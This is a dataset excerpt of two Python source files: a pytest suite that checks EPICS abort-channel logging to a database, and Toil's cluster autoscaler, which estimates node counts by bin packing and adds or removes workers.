source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_aborttl.py
|
import threading
import time
from datetime import datetime
from collections import namedtuple
import pytest
from epics import PV
from epics.ca import CAThread
from aborttl.dbhandler import DbHandler
from aborttl.abortch import AbortCh
from aborttl.aborttl import Aborttl
Signal = namedtuple('Signal', ['abt_id', 'ts', 'pvname', 'msg',
'ring', 'reset', 'tcnt', 'acnt'
]
)
def insert_current_pv_mock(uri):
dh = DbHandler(uri)
conn = dh.engine.connect()
mock_pvs = [
{'pvname': 'ET_dummyHost:ABORTCH1', 'ring': 'HER'},
{'pvname': 'ET_dummyHost:ABORTCH2', 'ring': 'HER'},
{'pvname': 'ET_dummyHost:ABORTCH3', 'ring': 'HER'},
{'pvname': 'ET_dummyHost:ABORTCH4', 'ring': 'LER'},
{'pvname': 'ET_dummyHost:ABORTCH5', 'ring': 'LER'}
]
mock_cpvs = [
{'pvname': 'ET_dummyHost:ABORTCH1', 'msg': 'msg 1'},
{'pvname': 'ET_dummyHost:ABORTCH2', 'msg': 'msg 2'},
{'pvname': 'ET_dummyHost:ABORTCH3', 'msg': 'msg 3'},
{'pvname': 'ET_dummyHost:ABORTCH4', 'msg': 'msg 4'},
{'pvname': 'ET_dummyHost:ABORTCH5', 'msg': 'msg 5'}
]
conn.execute(dh.tables['pvs'].insert(), mock_pvs)
conn.execute(dh.tables['current_pvs'].insert(), mock_cpvs)
conn.close()
return dh
def clear_ch(ch_num):
name = "ET_dummyHost:ABORTCH" + str(ch_num)
pv_abort = PV(name)
pv_acnt = PV(name + ':ACNT')
pv_tcnt = PV(name + ':TCNT')
pv_sec = PV(name + ':TIME_SEC')
pv_nsec = PV(name + ':TIME_NANO')
pv_abort.put(0, wait=True)
pv_acnt.put(0, wait=True)
pv_tcnt.put(0, wait=True)
pv_sec.put(0, wait=True)
pv_nsec.put(0, wait=True)
def put_abort_ch(ch_num, acnt, tcnt, _t=None):
t = time.time() if _t is None else _t
name = "ET_dummyHost:ABORTCH" + str(ch_num)
t_sec, t_nano = ("%.9f" % t).split(".")
pv_abort = PV(name)
pv_acnt = PV(name + ':ACNT')
pv_tcnt = PV(name + ':TCNT')
pv_sec = PV(name + ':TIME_SEC')
pv_nsec = PV(name + ':TIME_NANO')
pv_abort.put(1, wait=True)
pv_acnt.put(acnt, wait=True)
pv_tcnt.put(tcnt, wait=True)
pv_sec.put(int(t_sec), wait=True)
pv_nsec.put(int(t_nano), wait=True)
dt = datetime.fromtimestamp(int(t_sec))
return '{}.{}'.format(dt.isoformat(' '), t_nano)
def abort_reset():
pv = PV('ET_dummyHost:RESETw')
pv.put(1, wait=True)
time.sleep(1.1)
def check_signals(ss_test, ss_db):
assert len(ss_test) == len(ss_db)
for s_test, s_db in zip(ss_test, ss_db):
err_msg = '{} = {}'.format(s_db, s_test)
assert s_db['abt_id'] == s_test.abt_id, err_msg
assert s_db['ts'] == s_test.ts, err_msg
assert s_db['pvname'] == s_test.pvname, err_msg
assert s_db['msg'] == s_test.msg, err_msg
assert s_db['ring'] == s_test.ring, err_msg
assert s_db['reset_cnt'] == s_test.reset, err_msg
assert s_db['trg_cnt'] == s_test.tcnt, err_msg
assert s_db['int_cnt'] == s_test.acnt, err_msg
def set_initial_abort_state():
put_abort_ch(3, 0, 0)
put_abort_ch(5, 0, 0)
@pytest.fixture(scope='module')
def atl(softioc, caclient, tmpdir_factory):
AbortCh.fields['ACNT'] = ':ACNT'
AbortCh.fields['TCNT'] = ':TCNT'
dburi = ('sqlite:///' +
str(tmpdir_factory.mktemp('data').join('testdata.db'))
)
insert_current_pv_mock(dburi)
set_initial_abort_state()
atl = Aborttl(dburi, 'ET_dummyHost:RESETw')
thread = CAThread(target=atl.run)
thread.daemon = True
thread.start()
time.sleep(5)
yield atl
atl.stop()
thread.join()
time.sleep(1)
def test_initial_abort(softioc, caclient, atl):
t1 = put_abort_ch(1, 0, 0)
t2 = put_abort_ch(2, 1, 0)
time.sleep(2)
abort_reset()
clear_ch(1)
time.sleep(6)
put_abort_ch(1, 0, 1)
t4 = put_abort_ch(4, 2, 1)
put_abort_ch(1, 1, 1)
time.sleep(2)
signals = atl._dh.fetch_abort_signals(include_no_abt_id=True)
ss = [Signal(None, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0),
Signal(None, t2, 'ET_dummyHost:ABORTCH2', 'msg 2', 'HER', 0, 0, 1),
Signal(None, t4, 'ET_dummyHost:ABORTCH4', 'msg 4', 'LER', 1, 1, 2)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)
def test_single_ring_abort(softioc, caclient, atl):
t1 = put_abort_ch(1, 0, 0)
t2 = put_abort_ch(2, 1, 0)
time.sleep(2)
abort_reset()
clear_ch(1)
time.sleep(6)
put_abort_ch(1, 0, 1)
t3 = put_abort_ch(3, 1, 1)
t4 = put_abort_ch(4, 2, 1)
put_abort_ch(1, 1, 1)
t5 = put_abort_ch(5, 1, 2)
time.sleep(2)
signals = atl._dh.fetch_abort_signals()
ss = [Signal(1, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0),
Signal(1, t2, 'ET_dummyHost:ABORTCH2', 'msg 2', 'HER', 0, 0, 1),
Signal(1, t3, 'ET_dummyHost:ABORTCH3', 'msg 3', 'HER', 1, 1, 1),
Signal(2, t4, 'ET_dummyHost:ABORTCH4', 'msg 4', 'LER', 0, 1, 2),
Signal(2, t5, 'ET_dummyHost:ABORTCH5', 'msg 5', 'LER', 0, 2, 1)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)
def test_both_ring_abort(softioc, caclient, atl):
init_time = time.time()
init_dt = datetime.fromtimestamp(init_time)
time.sleep(1)
t1 = put_abort_ch(1, 0, 0)
t2 = put_abort_ch(2, 1, 0)
time.sleep(1)
abort_reset()
clear_ch(1)
time.sleep(1)
put_abort_ch(1, 0, 1)
t3 = put_abort_ch(3, 1, 1)
t4 = put_abort_ch(4, 2, 1)
put_abort_ch(1, 1, 1)
t5 = put_abort_ch(5, 1, 2)
time.sleep(2)
signals = atl._dh.fetch_abort_signals(astart=init_dt.isoformat(' '))
ss = [Signal(3, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0),
Signal(3, t2, 'ET_dummyHost:ABORTCH2', 'msg 2', 'HER', 0, 0, 1),
Signal(3, t3, 'ET_dummyHost:ABORTCH3', 'msg 3', 'HER', 1, 1, 1),
Signal(3, t4, 'ET_dummyHost:ABORTCH4', 'msg 4', 'LER', 1, 1, 2),
Signal(3, t5, 'ET_dummyHost:ABORTCH5', 'msg 5', 'LER', 1, 2, 1)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)
def test_new_faster_abort(softioc, caclient, atl):
init_time = time.time()
init_dt = datetime.fromtimestamp(init_time)
time.sleep(1)
t1_time = time.time()
time.sleep(1)
mid_time = time.time()
mid_dt = datetime.fromtimestamp(mid_time)
time.sleep(1)
t2 = put_abort_ch(2, 0, 1)
time.sleep(1)
t1 = put_abort_ch(1, 0, 0, t1_time)
time.sleep(1)
t3 = put_abort_ch(3, 1, 1)
time.sleep(2)
signals = atl._dh.fetch_abort_signals(astart=mid_dt.isoformat(' '))
assert signals == []
signals = atl._dh.fetch_abort_signals(astart=init_dt.isoformat(' '))
ss = [Signal(4, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0),
Signal(4, t2, 'ET_dummyHost:ABORTCH2', 'msg 2', 'HER', 0, 1, 0),
Signal(4, t3, 'ET_dummyHost:ABORTCH3', 'msg 3', 'HER', 0, 1, 1)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)
def test_timestamp_update_later(softioc, caclient, atl):
init_time = time.time()
init_dt = datetime.fromtimestamp(init_time)
put_abort_ch(1, 0, 0, 0)
time.sleep(1)
clear_ch(1)
t1 = put_abort_ch(1, 0, 0)
time.sleep(2)
signals = atl._dh.fetch_abort_signals(astart=init_dt.isoformat(' '))
ss = [Signal(5, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(3)
def test_timestamp_update_later(softioc, caclient, atl):
init_time = time.time()
init_dt = datetime.fromtimestamp(init_time)
put_abort_ch(1, 0, 0, 0)
time.sleep(1)
clear_ch(1)
t1 = put_abort_ch(1, 0, 0)
time.sleep(2)
signals = atl._dh.fetch_abort_signals(astart=init_dt.isoformat(' '))
ss = [Signal(5, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)
|
clusterScaler.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import json
import logging
import os
from collections import deque
from threading import Lock
import time
from bd2k.util.exceptions import require
from bd2k.util.retry import retry
from bd2k.util.threading import ExceptionalThread
from bd2k.util.throttle import throttle
from itertools import islice
from toil.batchSystems.abstractBatchSystem import AbstractScalableBatchSystem, NodeInfo
from toil.common import Config
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
logger = logging.getLogger(__name__)
# A *deficit* exists when we have more jobs that can run on preemptable nodes than we have
# preemptable nodes. In order to not block these jobs, we want to increase the number of non-
# preemptable nodes that we have and need for just non-preemptable jobs. However, we may still
# prefer waiting for preemptable instances to come available.
#
# To accommodate this, we set the delta to the difference between the number of provisioned
# preemptable nodes and the number of nodes that were requested. when the non-preemptable thread
# wants to provision nodes, it will multiply this delta times a preference for preemptable vs.
# non-preemptable nodes.
_preemptableNodeDeficit = 0
class RecentJobShapes(object):
"""
Used to track the 'shapes' of the last N jobs run (see Shape).
"""
def __init__(self, config, nodeShape, N=1000):
# As a prior we start of with 10 jobs each with the default memory, cores, and disk. To
# estimate the running time we use the the default wall time of each node allocation,
# so that one job will fill the time per node.
self.jobShapes = deque(maxlen=N,
iterable=10 * [Shape(wallTime=nodeShape.wallTime,
memory=config.defaultMemory,
cores=config.defaultCores,
disk=config.defaultDisk)])
# Calls to add and getLastNJobShapes may be concurrent
self.lock = Lock()
# Number of jobs to average over
self.N = N
def add(self, jobShape):
"""
Adds a job shape as the last completed job.
:param Shape jobShape: The memory, core and disk requirements of the completed job
"""
with self.lock:
self.jobShapes.append(jobShape)
def get(self):
"""
Gets the last N job shapes added.
"""
with self.lock:
return list(self.jobShapes)
def binPacking(jobShapes, nodeShape):
"""
Use a first fit decreasing (FFD) bin packing like algorithm to calculate an approximate
minimum number of nodes that will fit the given list of jobs.
:param Shape nodeShape: The properties of an atomic node allocation, in terms of wall-time,
memory, cores and local disk.
:param list[Shape] jobShapes: A list of shapes, each representing a job.
Let a *node reservation* be an interval of time that a node is reserved for, it is defined by
an integer number of node-allocations.
For a node reservation its *jobs* are the set of jobs that will be run within the node
reservation.
A minimal node reservation has time equal to one atomic node allocation, or the minimum
number node allocations to run the longest running job in its jobs.
:rtype: int
:returns: The minimum number of minimal node allocations estimated to be required to run all
the jobs in jobShapes.
"""
logger.debug('Running bin packing for node shape %s and %s job(s).', nodeShape, len(jobShapes))
# Sort in descending order from largest to smallest. The FFD like-strategy will pack the jobs in order from longest
# to shortest.
jobShapes.sort()
jobShapes.reverse()
assert len(jobShapes) == 0 or jobShapes[0] >= jobShapes[-1]
class NodeReservation(object):
"""
Represents a node reservation. To represent the resources available in a reservation a
node reservation is represented as a sequence of Shapes, each giving the resources free
within the given interval of time
"""
def __init__(self, shape):
# The wall-time and resource available
self.shape = shape
# The next portion of the reservation
self.nReservation = None
nodeReservations = [] # The list of node reservations
for jS in jobShapes:
def addToReservation():
"""
Function adds the job, jS, to the first node reservation in which it will fit (this
is the bin-packing aspect)
"""
def fits(x, y):
"""
Check if a job shape's resource requirements will fit within a given node allocation
"""
return y.memory <= x.memory and y.cores <= x.cores and y.disk <= x.disk
def subtract(x, y):
"""
Adjust available resources of a node allocation as a job is scheduled within it.
"""
return Shape(x.wallTime, x.memory - y.memory, x.cores - y.cores, x.disk - y.disk)
def split(x, y, t):
"""
Partition a node allocation into two
"""
return (Shape(t, x.memory - y.memory, x.cores - y.cores, x.disk - y.disk),
NodeReservation(Shape(x.wallTime - t, x.memory, x.cores, x.disk)))
i = 0 # Index of node reservation
while True:
# Case a new node reservation is required
if i == len(nodeReservations):
x = NodeReservation(subtract(nodeShape, jS))
nodeReservations.append(x)
t = nodeShape.wallTime
while t < jS.wallTime:
y = NodeReservation(x.shape)
t += nodeShape.wallTime
x.nReservation = y
x = y
return
# Attempt to add the job to node reservation i
x = nodeReservations[i]
y = x
t = 0
while True:
if fits(y.shape, jS):
t += y.shape.wallTime
# If the jS fits in the node allocation from x to y
if t >= jS.wallTime:
t = 0
while x != y:
x.shape = subtract(x.shape, jS)
t += x.shape.wallTime
x = x.nReservation
assert x == y
assert jS.wallTime - t <= x.shape.wallTime
if jS.wallTime - t < x.shape.wallTime:
x.shape, nS = split(x.shape, jS, jS.wallTime - t)
nS.nReservation = x.nReservation
x.nReservation = nS
else:
assert jS.wallTime - t == x.shape.wallTime
x.shape = subtract(x.shape, jS)
return
# If the job would fit, but is longer than the total node allocation
# extend the node allocation
elif y.nReservation == None and x == nodeReservations[i]:
# Extend the node reservation to accommodate jS
y.nReservation = NodeReservation(nodeShape)
else: # Does not fit, reset
x = y.nReservation
t = 0
y = y.nReservation
if y is None:
# Reached the end of the reservation without success so stop trying to
# add to reservation i
break
i += 1
addToReservation()
logger.debug("Done running bin packing for node shape %s and %s job(s) resulting in %s node "
"reservations.", nodeShape, len(jobShapes), len(nodeReservations))
return len(nodeReservations)
class ClusterScaler(object):
def __init__(self, provisioner, leader, config):
"""
Class manages automatically scaling the number of worker nodes.
:param AbstractProvisioner provisioner: Provisioner instance to scale.
:param toil.leader.Leader leader:
:param Config config: Config object from which to draw parameters.
"""
self.provisioner = provisioner
self.leader = leader
self.config = config
# Indicates that the scaling threads should shutdown
self.stop = False
assert config.maxPreemptableNodes >= 0 and config.maxNodes >= 0
require(config.maxPreemptableNodes + config.maxNodes > 0,
'Either --maxNodes or --maxPreemptableNodes must be non-zero.')
self.preemptableScaler = ScalerThread(self, preemptable=True) if self.config.maxPreemptableNodes > 0 else None
self.scaler = ScalerThread(self, preemptable=False) if self.config.maxNodes > 0 else None
def start(self):
"""
Start the cluster scaler thread(s).
"""
if self.preemptableScaler != None:
self.preemptableScaler.start()
if self.scaler != None:
self.scaler.start()
def check(self):
"""
Attempt to join any existing scaler threads that may have died or finished. This insures
any exceptions raised in the threads are propagated in a timely fashion.
"""
exception = False
for scalerThread in [self.preemptableScaler, self.scaler]:
if scalerThread is not None:
try:
scalerThread.join(timeout=0)
except Exception as e:
logger.exception(e)
exception = True
if exception:
raise RuntimeError('The cluster scaler has exited due to an exception')
def shutdown(self):
"""
Shutdown the cluster.
"""
self.stop = True
for scaler in self.preemptableScaler, self.scaler:
if scaler is not None:
scaler.join()
def addCompletedJob(self, job, wallTime):
"""
Adds the shape of a completed job to the queue, allowing the scalar to use the last N
completed jobs in factoring how many nodes are required in the cluster.
:param toil.job.JobNode job: The memory, core and disk requirements of the completed job
:param int wallTime: The wall-time taken to complete the job in seconds.
"""
s = Shape(wallTime=wallTime, memory=job.memory, cores=job.cores, disk=job.disk)
if job.preemptable and self.preemptableScaler is not None:
self.preemptableScaler.jobShapes.add(s)
else:
self.scaler.jobShapes.add(s)
class ScalerThread(ExceptionalThread):
"""
A thread that automatically scales the number of either preemptable or non-preemptable worker
nodes according to the number of jobs queued and the resource requirements of the last N
completed jobs.
The scaling calculation is essentially as follows: Use the RecentJobShapes instance to
calculate how many nodes, n, can be used to productively compute the last N completed
jobs. Let M be the number of jobs issued to the batch system. The number of nodes
required is then estimated to be alpha * n * M/N, where alpha is a scaling factor used to
adjust the balance between under- and over- provisioning the cluster.
At each scaling decision point a comparison between the current, C, and newly estimated
number of nodes is made. If the absolute difference is less than beta * C then no change
is made, else the size of the cluster is adapted. The beta factor is an inertia parameter
that prevents continual fluctuations in the number of nodes.
"""
def __init__(self, scaler, preemptable):
"""
:param ClusterScaler scaler: the parent class
"""
super(ScalerThread, self).__init__(name='preemptable-scaler' if preemptable else 'scaler')
self.scaler = scaler
self.preemptable = preemptable
self.nodeTypeString = ("preemptable" if self.preemptable else "non-preemptable") + " nodes" # Used for logging
# Resource requirements and wall-time of an atomic node allocation
self.nodeShape = scaler.provisioner.getNodeShape(preemptable=preemptable)
# Monitors the requirements of the N most recently completed jobs
self.jobShapes = RecentJobShapes(scaler.config, self.nodeShape)
# Minimum/maximum number of either preemptable or non-preemptable nodes in the cluster
self.minNodes = scaler.config.minPreemptableNodes if preemptable else scaler.config.minNodes
self.maxNodes = scaler.config.maxPreemptableNodes if preemptable else scaler.config.maxNodes
if isinstance(self.scaler.leader.batchSystem, AbstractScalableBatchSystem):
for preemptable in (True, False):
# although this thread only deals with either preemptable or non-preemptable nodes,
# the presence of any statically provisioned nodes effects both scaler threads so we
# will check for both preemptable and non preemptable static nodes
nodes = self.scaler.leader.provisioner.getProvisionedWorkers(preemptable)
self.scaler.provisioner.setStaticNodes(nodes, preemptable)
if preemptable == self.preemptable:
self.totalNodes = len(nodes) if nodes else 0
else:
self.totalNodes = 0
logger.info('Starting with %s %s(s) in the cluster.', self.totalNodes, self.nodeTypeString)
self.stats = None
if scaler.config.clusterStats:
logger.debug("Starting up cluster statistics...")
self.stats = ClusterStats(self.scaler.leader.config.clusterStats,
self.scaler.leader.batchSystem,
self.scaler.provisioner.clusterName)
self.stats.startStats(preemptable=preemptable)
logger.debug("...Cluster stats started.")
def tryRun(self):
global _preemptableNodeDeficit
while not self.scaler.stop:
with throttle(self.scaler.config.scaleInterval):
self.totalNodes = len(self.scaler.leader.provisioner.getProvisionedWorkers(self.preemptable))
# Estimate the number of nodes to run the issued jobs.
# Number of jobs issued
queueSize = self.scaler.leader.getNumberOfJobsIssued(preemptable=self.preemptable)
# Job shapes of completed jobs
recentJobShapes = self.jobShapes.get()
assert len(recentJobShapes) > 0
# Estimate of number of nodes needed to run recent jobs
nodesToRunRecentJobs = binPacking(recentJobShapes, self.nodeShape)
# Actual calculation of the estimated number of nodes required
estimatedNodes = 0 if queueSize == 0 else max(1, int(round(
self.scaler.config.alphaPacking
* nodesToRunRecentJobs
* float(queueSize) / len(recentJobShapes))))
# Account for case where the average historical runtime of completed jobs is less
# than the runtime of currently running jobs. This is important
# to avoid a deadlock where the estimated number of nodes to run the jobs
# is too small to schedule a set service jobs and their dependent jobs, leading
# to service jobs running indefinitely.
# How many jobs are currently running and their average runtime.
numberOfRunningJobs, currentAvgRuntime = self.scaler.leader.getNumberAndAvgRuntimeOfCurrentlyRunningJobs()
# Average runtime of recently completed jobs
historicalAvgRuntime = sum(map(lambda jS : jS.wallTime, recentJobShapes))/len(recentJobShapes)
# Ratio of avg. runtime of currently running and completed jobs
runtimeCorrection = float(currentAvgRuntime)/historicalAvgRuntime if currentAvgRuntime > historicalAvgRuntime and numberOfRunningJobs >= estimatedNodes else 1.0
# Make correction, if necessary (only do so if cluster is busy and average runtime is higher than historical
# average)
if runtimeCorrection != 1.0:
estimatedNodes = int(round(estimatedNodes * runtimeCorrection))
if self.totalNodes < self.maxNodes:
logger.warn("Historical avg. runtime (%s) is less than current avg. runtime (%s) and cluster"
" is being well utilised (%s running jobs), increasing cluster requirement by: %s" %
(historicalAvgRuntime, currentAvgRuntime, numberOfRunningJobs, runtimeCorrection))
# If we're the non-preemptable scaler, we need to see if we have a deficit of
# preemptable nodes that we should compensate for.
if not self.preemptable:
compensation = self.scaler.config.preemptableCompensation
assert 0.0 <= compensation <= 1.0
# The number of nodes we provision as compensation for missing preemptable
# nodes is the product of the deficit (the number of preemptable nodes we did
# _not_ allocate) and configuration preference.
compensationNodes = int(round(_preemptableNodeDeficit * compensation))
if compensationNodes > 0:
logger.info('Adding %d preemptable nodes to compensate for a deficit of %d '
'non-preemptable ones.', compensationNodes, _preemptableNodeDeficit)
estimatedNodes += compensationNodes
jobsPerNode = (0 if nodesToRunRecentJobs <= 0
else len(recentJobShapes) / float(nodesToRunRecentJobs))
if estimatedNodes > 0 and self.totalNodes < self.maxNodes:
logger.info('Estimating that cluster needs %s %s of shape %s, from current '
'size of %s, given a queue size of %s, the number of jobs per node '
'estimated to be %s, an alpha parameter of %s and a run-time length correction of %s.',
estimatedNodes, self.nodeTypeString, self.nodeShape,
self.totalNodes, queueSize, jobsPerNode,
self.scaler.config.alphaPacking, runtimeCorrection)
# Use inertia parameter to stop small fluctuations
delta = self.totalNodes * max(0.0, self.scaler.config.betaInertia - 1.0)
if self.totalNodes - delta <= estimatedNodes <= self.totalNodes + delta:
logger.debug('Difference in new (%s) and previous estimates in number of '
'%s (%s) required is within beta (%s), making no change.',
estimatedNodes, self.nodeTypeString, self.totalNodes, self.scaler.config.betaInertia)
estimatedNodes = self.totalNodes
# Bound number using the max and min node parameters
if estimatedNodes > self.maxNodes:
logger.debug('Limiting the estimated number of necessary %s (%s) to the '
'configured maximum (%s).', self.nodeTypeString, estimatedNodes, self.maxNodes)
estimatedNodes = self.maxNodes
elif estimatedNodes < self.minNodes:
logger.info('Raising the estimated number of necessary %s (%s) to the '
'configured mininimum (%s).', self.nodeTypeString, estimatedNodes, self.minNodes)
estimatedNodes = self.minNodes
if estimatedNodes != self.totalNodes:
logger.info('Changing the number of %s from %s to %s.', self.nodeTypeString, self.totalNodes,
estimatedNodes)
self.totalNodes = self.setNodeCount(numNodes=estimatedNodes, preemptable=self.preemptable)
# If we were scaling up the number of preemptable nodes and failed to meet
# our target, we need to update the slack so that non-preemptable nodes will
# be allocated instead and we won't block. If we _did_ meet our target,
# we need to reset the slack to 0.
if self.preemptable:
if self.totalNodes < estimatedNodes:
deficit = estimatedNodes - self.totalNodes
logger.info('Preemptable scaler detected deficit of %d nodes.', deficit)
_preemptableNodeDeficit = deficit
else:
_preemptableNodeDeficit = 0
if self.stats:
self.stats.checkStats()
self.shutDown(preemptable=self.preemptable)
logger.info('Scaler exited normally.')
def setNodeCount(self, numNodes, preemptable=False, force=False):
"""
Attempt to grow or shrink the number of prepemptable or non-preemptable worker nodes in
the cluster to the given value, or as close a value as possible, and, after performing
the necessary additions or removals of worker nodes, return the resulting number of
preemptable or non-preemptable nodes currently in the cluster.
:param int numNodes: Desired size of the cluster
:param bool preemptable: whether the added nodes will be preemptable, i.e. whether they
may be removed spontaneously by the underlying platform at any time.
:param bool force: If False, the provisioner is allowed to deviate from the given number
of nodes. For example, when downsizing a cluster, a provisioner might leave nodes
running if they have active jobs running on them.
:rtype: int :return: the number of worker nodes in the cluster after making the necessary
adjustments. This value should be, but is not guaranteed to be, close or equal to
the `numNodes` argument. It represents the closest possible approximation of the
actual cluster size at the time this method returns.
"""
for attempt in retry(predicate=self.scaler.provisioner.retryPredicate):
with attempt:
workerInstances = self.getNodes(preemptable=preemptable)
numCurrentNodes = len(workerInstances)
delta = numNodes - numCurrentNodes
if delta > 0:
logger.info('Adding %i %s nodes to get to desired cluster size of %i.', delta, 'preemptable' if preemptable else 'non-preemptable', numNodes)
numNodes = numCurrentNodes + self._addNodes(numNodes=delta,
preemptable=preemptable)
elif delta < 0:
logger.info('Removing %i %s nodes to get to desired cluster size of %i.', -delta, 'preemptable' if preemptable else 'non-preemptable', numNodes)
numNodes = numCurrentNodes - self._removeNodes(workerInstances,
numNodes=-delta,
preemptable=preemptable,
force=force)
else:
logger.info('Cluster already at desired size of %i. Nothing to do.', numNodes)
return numNodes
def _addNodes(self, numNodes, preemptable):
return self.scaler.provisioner.addNodes(numNodes, preemptable)
def _removeNodes(self, nodeToNodeInfo, numNodes, preemptable=False, force=False):
# If the batch system is scalable, we can use the number of currently running workers on
# each node as the primary criterion to select which nodes to terminate.
if isinstance(self.scaler.leader.batchSystem, AbstractScalableBatchSystem):
# iMap = ip : instance
ipMap = {node.privateIP: node for node in nodeToNodeInfo.keys()}
def filterRemovableNodes(executorInfo):
return not bool(self.chooseNodes({ipMap.get(executorInfo.nodeAddress): executorInfo.nodeInfo},
preemptable=preemptable))
with self.scaler.leader.batchSystem.nodeFiltering(filterRemovableNodes):
# while this context manager is active, the batch system will not launch any
# news tasks on nodes that are being considered for termination (as determined by the
# filterRemovableNodes method)
nodeToNodeInfo = self.getNodes(preemptable)
# Join nodes and instances on private IP address.
logger.debug('Nodes considered to terminate: %s', ' '.join(map(str, nodeToNodeInfo)))
nodesToTerminate = self.chooseNodes(nodeToNodeInfo, force, preemptable=preemptable)
nodesToTerminate = nodesToTerminate[:numNodes]
if logger.isEnabledFor(logging.DEBUG):
for instance in nodesToTerminate:
logger.debug("Instance %s is about to be terminated. It "
"would be billed again in %s minutes.",
instance, 60 * self.scaler.provisioner.remainingBillingInterval(instance))
nodeToNodeInfo = nodesToTerminate
else:
# Without load info all we can do is sort instances by time left in billing cycle.
nodeToNodeInfo = sorted(nodeToNodeInfo, key=self.scaler.provisioner.remainingBillingInterval)
nodeToNodeInfo = [instance for instance in islice(nodeToNodeInfo, numNodes)]
logger.info('Terminating %i instance(s).', len(nodeToNodeInfo))
if nodeToNodeInfo:
self.scaler.provisioner.terminateNodes(nodeToNodeInfo)
return len(nodeToNodeInfo)
def chooseNodes(self, nodeToNodeInfo, force=False, preemptable=False):
# Unless forced, exclude nodes with runnning workers. Note that it is possible for
# the batch system to report stale nodes for which the corresponding instance was
# terminated already. There can also be instances that the batch system doesn't have
# nodes for yet. We'll ignore those, too, unless forced.
nodesToTerminate = []
for node, nodeInfo in nodeToNodeInfo.items():
if node is None:
logger.info("Node with info %s was not found in our node list", nodeInfo)
continue
staticNodes = self.scaler.provisioner.getStaticNodes(preemptable)
prefix = 'non-' if not preemptable else ''
if node.privateIP in staticNodes:
# we don't want to automatically terminate any statically
# provisioned nodes
logger.debug("Found %s in %spreemptable static nodes", node.privateIP, prefix)
continue
else:
logger.debug("Did not find %s in %spreemptable static nodes", node.privateIP, prefix)
pass
if force:
nodesToTerminate.append((node, nodeInfo))
elif nodeInfo is not None and nodeInfo.workers < 1:
nodesToTerminate.append((node, nodeInfo))
else:
logger.debug('Not terminating instances %s. Node info: %s', node, nodeInfo)
# Sort nodes by number of workers and time left in billing cycle
nodesToTerminate.sort(key=lambda ((node, nodeInfo)): (
nodeInfo.workers if nodeInfo else 1,
self.scaler.provisioner.remainingBillingInterval(node))
)
if not force:
# don't terminate nodes that still have > 15% left in their allocated (prepaid) time
nodesToTerminate = [node for node in nodesToTerminate if
self.scaler.provisioner.remainingBillingInterval(node) <= 0.15]
return [node for node,_ in nodesToTerminate]
def getNodes(self, preemptable):
"""
Returns a dictionary mapping node identifiers of preemptable or non-preemptable nodes to
NodeInfo objects, one for each node.
This method is the definitive source on nodes in cluster, & is responsible for consolidating
cluster state between the provisioner & batch system.
:param bool preemptable: If True (False) only (non-)preemptable nodes will be returned.
If None, all nodes will be returned.
:rtype: dict[Node, NodeInfo]
"""
def _getInfo(allMesosNodes, ip):
info = None
try:
info = allMesosNodes[ip]
except KeyError:
# never seen by mesos - 1 of 3 possibilities:
# 1) node is still launching mesos & will come online soon
# 2) no jobs have been assigned to this worker. This means the executor was never
# launched, so we don't even get an executorInfo back indicating 0 workers running
# 3) mesos crashed before launching, worker will never come online
# In all 3 situations it's safe to fake executor info with 0 workers, since in all
# cases there are no workers running. We also won't waste any money in cases 1/2 since
# we will still wait for the end of the node's billing cycle for the actual
# termination.
info = NodeInfo(coresTotal=1, coresUsed=0, requestedCores=0,
memoryTotal=1, memoryUsed=0, requestedMemory=0,
workers=0)
else:
# Node was tracked but we haven't seen this in the last 10 minutes
inUse = self.scaler.leader.batchSystem.nodeInUse(ip)
if not inUse:
# The node hasn't reported in the last 10 minutes & last we know
# there weren't any tasks running. We will fake executorInfo with no
# worker to reflect this, since otherwise this node will never
# be considered for termination
info.workers = 0
else:
pass
# despite the node not reporting to mesos jobs may still be running
# so we can't terminate the node
return info
allMesosNodes = self.scaler.leader.batchSystem.getNodes(preemptable, timeout=None)
recentMesosNodes = self.scaler.leader.batchSystem.getNodes(preemptable)
provisionerNodes = self.scaler.provisioner.getProvisionedWorkers(preemptable)
if len(recentMesosNodes) != len(provisionerNodes):
logger.debug("Consolidating state between mesos and provisioner")
nodeToInfo = {}
# fixme: what happens if awsFilterImpairedNodes is used?
# if this assertion is false it means that user-managed nodes are being
# used that are outside the provisioners control
# this would violate many basic assumptions in autoscaling so it currently not allowed
for node, ip in ((node, node.privateIP) for node in provisionerNodes):
info = None
if ip not in recentMesosNodes:
logger.debug("Worker node at %s is not reporting executor information")
# we don't have up to date information about the node
info = _getInfo(allMesosNodes, ip)
else:
# mesos knows about the ip & we have up to date information - easy!
info = recentMesosNodes[ip]
# add info to dict to return
nodeToInfo[node] = info
return nodeToInfo
def shutDown(self, preemptable):
if self.stats:
self.stats.shutDownStats()
logger.debug('Forcing provisioner to reduce cluster size to zero.')
totalNodes = self.setNodeCount(numNodes=0, preemptable=preemptable, force=True)
if totalNodes > len(self.scaler.provisioner.getStaticNodes(preemptable)): # ignore static nodes
raise RuntimeError('Provisioner could not terminate all autoscaled nodes. There are '
'%s nodes left in the cluster, %s of which were statically provisioned' % (totalNodes, len(self.getStaticNodes(preemptable)))
)
